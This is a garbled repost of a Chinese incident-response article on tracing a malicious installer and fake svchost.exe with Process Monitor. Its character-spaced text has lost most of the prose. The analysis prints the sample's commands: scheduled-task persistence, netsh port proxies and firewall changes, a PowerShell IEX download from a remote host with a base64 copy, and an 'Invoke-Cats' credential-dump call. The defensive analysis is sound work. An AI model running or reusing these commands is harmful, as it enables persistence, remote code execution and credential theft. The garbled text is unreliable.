[15387] 2020-05-18_应急响应系列之利用ProcessMonitor进行恶意文件分析

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2020-05-18_应急响应系列之利用ProcessMonitor进行恶意文件分析 P r o c e s s M o n i t o r f e i n i a o   F r e e B u f   2 0 2 0 - 0 5 - 1 8   使 使 P r o c e s M o n i t o r P r o c e s s M o n i t o r P r o c e s M o n i t o r E D R R a m n i t S a l i t y 1 .     ( ) 2 .     c : w i n d o w s 1 . e x e c : w i n d o w s ( M D 5 ) P r o c e s s M o n i t o r : 3 . 1   使 P r o c e s s M o n i t o r P I D
r e g s e t v a l u e R e g S h o t 3 . 2  
3 . 3   T C P I P 使 w i r e s h a r k t s h a r k 3 . 4   线 线 线 线 S M B R D P 线 线 P r o c e s s M o n i t o r s h o w   p r o c e s s   t r e e 4 . 1   s e t u p - i n s t a l l . e x e s v c h o s t . e x e 使 P r o c e s s M o n i t o r h t t p s : / / w w w . 5 2 p o j i e . c n / t h r e a d - 9 8 3 5 1 9 - 1 - 1 . h t m l s e t u p - i n s t a l l . e x e s v c h o s t . e x e 使 P r o c e s s M o n i t o r 4 . 2     4 . 2 . 1       s e t u p - i n s t a l l . e x e 使 s h o w   p r o c e s s t r e e s e t u p - i n s t a l l . e x e
: 4 . 2 . 2       s v c h o s t . e x e 使 s h o w p r o c e s s   t r e e s v c h o s t . e x e c o m m a n d 4 . 3   S e t u p - i n s t a l l . e x e t t t . e x e 4 . 4   1 . D d r i v e r c : w i n d o w s S y s W O W 6 4 d r i v e r s s v c h o s t . e x e #   s c     s t a r t   S c h e d u l e s c     q u e r y   S c h e d u l e n e t s t a r t   W e b S e r v e r s #   W e b S e r v e r s W e b S e r v e r s s t a r t / b   s c   s t a r t   S c h e d u l e & p i n g   l o c a l h o s t & s c   q u e r y   S c h e d u l e | f i n d s t r R U N N I N G & & ( s c h t a s k s   / d e l e t e   / T N   W e b S e r v e r s   / f & s c h t a s k s   / c r e a t e   / r u s y s t e m   / s c   M I N U T E   / m o   5 0   / S T   0 7 : 0 0 : 0 0   / T N   W e b S e r v e r s   / t r   " c m d . e x e   / c c : w i n d o w s S y s W O W 6 4 w m i e x . e x e " & s c h t a s k s   / r u n   / T N   W e b S e r v e r s ) #   s v h o s t . e x e s v h h o s t . e x e s v v h o s t . e x e w m i e x . e x e t a s k k i l l / f   / i m   s v h o s t . e x e   / i m   s v h h o s t . e x e   / i m   s v v h o s t . e x e   &   m o v e   / y c : w i n d o w s t e m p s v v h o s t . e x e   c : w i n d o w s t e m p s v c h o s t . e x e   &   d e l c : w i n d o w s s y s t e m 3 2 s v h h o s t . e x e   &   d e l   c : w i n d o w s s y s w o w 6 4 s v h h o s t . e x e t a s k k i l l / f   / i m   w m i e x . e x e #   w m i c w m i c     p r o c e s s   w h e r e   " n a m e = ' s v h o s t . e x e '   o r n a m e = ' s v h h o s t . e x e '   o r   n a m e = ' s v v h o s t . e x e ' "   d e l e t e w m i c     p r o c e s s   w h e r e   " E x e c u t a b l e P a t h   l i k e ' % d r i v e r s % '   a n d   n a m e = ' t a s k m g r . e x e ' "   d e l e t e w m i c     p r o c e s s   w h e r e   " E x e c u t a b l e P a t h   l i k e ' % d r i v e r s % '   a n d   n a m e = ' s v c h o s t . e x e ' "   d e l e t e w m i c     p r o c e s s   w h e r e   " E x e c u t a b l e P a t h   l i k e ' % e m p % '   a n d   n a m e = ' s v c h o s t . e x e ' "   d e l e t e #   6 5 5 3 1 - 6 5 5 3 3 1 . 1 . 1 . 1 5 3 n e t s h i n t e r f a c e   i p v 6   i n s t a l l & n e t s h   f i r e w a l l   a d d   p o r t o p e n i n g   t c p   6 5 5 3 2   U D P n e t s h i n t e r f a c e   p o r t p r o x y   a d d   v 4 t o v 4   l i s t e n p o r t = 6 5 5 3 2   c o n n e c t a d d r e s s = 1 . 1 . 1 . 1 c o n n e c t p o r t = 5 3 n e t s h f i r e w a l l   a d d   p o r t o p e n i n g   t c p   6 5 5 3 1   U D P 2 n e t s h i n t e r f a c e   p o r t p r o x y   a d d   v 4 t o v 4   l i s t e n p o r t = 6 5 5 3 1   c o n n e c t a d d r e s s = 1 . 1 . 1 . 1 c o n n e c t p o r t = 5 3 n e t s h f i r e w a l l   a d d   p o r t o p e n i n g   t c p   6 5 5 3 3   S h a r e S e r v i c e #   访 T C P   4 4 5 n e t u s e r & n e t s h   a d v f i r e w a l l   s e t   a l l p r o f i l e   s t a t e   o n & n e t s h   a d v f i r e w a l l f i r e w a l l   a d d   r u l e   n a m e = d e n y y 4 4 5   d i r = i n   a c t i o n = b l o c k   p r o t o c o l = T C P   l o c a l p o r t = 4 4 5 #   D n s S c a n C : W i n d o w s t e m p s v c h o s t . e x e s c h t a s k s / c r e a t e   / r u   s y s t e m   / s c   M I N U T E   / m o   6 0   / s t   0 7 : 0 5 : 0 0   / t n   D n s S c a n   / t r " C : W i n d o w s t e m p s v c h o s t . e x e "   / F #   p o w e r s h e l l b a s e 6 4 I E X   ( N e w - O b j e c t N e t . W e b C l i e n t ) . d o w n l o a d s t r i n g ( ' h t t p : / / v . b e a h h . c o m / v ' + $ e n v : U S E R D O M A I N ) s c h t a s k s / c r e a t e   / r u   s y s t e m   / s c   M I N U T E   / m o   5 0   / s t   0 7 : 0 0 : 0 0   / t n " M i c r o s o f t w i n d o w s B l u e t o o t h s "   / t r   " p o w e r s h e l l   - e p   b y p a s s   - e S Q B F A F g A I A A o A E 4 A Z Q B 3 A C 0 A T w B i A G o A Z Q B j A H Q A I A B O A G U A d A A u A F c A Z Q B i A E M A b A B p A G U A b g B 0 A C k A L g B k A G 8 A d w B u A G w A b w B h A G Q A c w B 0 A H I A a Q B u A G c A K A A n A G g A d A B 0 A H A A O g A v A C 8 A d g A u A G I A Z Q B h A G g A a A A u A G M A b w B t A C 8 A d g A n A C s A J A B l A G 4 A d g A 6 A F U A U w B F A F I A R A B P A E 0 A Q Q B J A E 4 A K Q A = " / F #   p o w e r s h e l l m . p s 1 C : W i n d o w s S y s N a t i v e W i n d o w s P o w e r S h e l l v 1 . 0 p o w e r s h e l l . e x e - e x e c   b y p a s s   " i m p o r t - m o d u l e   c : w i n d o w s t e m p m . p s 1 ; I n v o k e - C a t s   - p w d s " #   w m i c n t d o m a i n   g e t   d o m a i n n a m e n e t u s e r
2 . W e b S e r v e r s c : w i n d o w s S y s W O W 6 4 w m i e x . e x e 4 . 5   P r o c e s s M o n i t o r 4 . 6     h t t p s : / / s . t h r e a t b o o k . c n / r e p o r t / f i l e / b d b f a 9 6 d 1 7 c 2 f 0 6 f 6 8 b 3 b c c 8 4 5 6 8 c f 4 4 5 9 1 5 e 1 9 4 f 1 3 0 b 0 d c 2 4 1 1 8 0 5 c f 8 8 9 b 6 c c / ? s i g n = h i s t o r y & e n v = w i n 7 s p 1 e n x 8 6 _ o f f i c e 2 0 1 3 h t t p s : / / s . t h r e a t b o o k . c n / r e p o r t / f i l e / 6 0 b 6 d 7 6 6 4 5 9 8 e 6 a 9 8 8 d 9 3 8 9 e 6 3 5 9 8 3 8 b e 9 6 6 d f a 5 4 8 5 9 d 5 c b 1 4 5 3 c b c 9 b 1 2 6 e d 7 d / ? e n v = w i n 7 s p 1 e n x 8 6 _ o f f i c e 2 0 1 3 4 2 . p l 7 2 . 5 2 . 1 7 9 . 1 7 4 l i 1 1 7 6 - 2 0 . m e m b e r s . l i n o d e . c o m l i 1 1 7 6 - 2 0 . m e m b e r s . l i n o d e . c o m m a i l 4 1 1 . u s 2 . m c s v . n e t
使 P r o c e s s M o n i t o r 使   h t t p s : / / w w w . 5 2 p o j i e . c n / t h r e a d - 9 8 3 5 1 9 - 1 - 1 . h t m l h t t p s : / / s . t h r e a t b o o k . c n / r e p o r t / f i l e / 6 0 b 6 d 7 6 6 4 5 9 8 e 6 a 9 8 8 d 9 3 8 9 e 6 3 5 9 8 3 8 b e 9 6 6 d f a 5 4 8 5 9 d 5 c b 1 4 5 3 c b c 9 b 1 2 6 e d 7 d / ? e n v = w i n 7 s p 1 e n x 8 6 _ o f f i c e 2 0 1 3 h t t p s : / / s . t h r e a t b o o k . c n / r e p o r t / f i l e / b d b f a 9 6 d 1 7 c 2 f 0 6 f 6 8 b 3 b c c 8 4 5 6 8 c f 4 4 5 9 1 5 e 1 9 4 f 1 3 0 b 0 d c 2 4 1 1 8 0 5 c f 8 8 9 b 6 c c / ? s i g n = h i s t o r y & e n v = w i n 7 s p 1 e n x 8 6 _ o f f i c e 2 0 1 3 h t t p s : / / p a n . b a i d u . c o m / s / 1 f L a x s t v U E D a 8 _ r 3 e Y 4 q 3 8 w 0 e v l * f e i n i a o F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则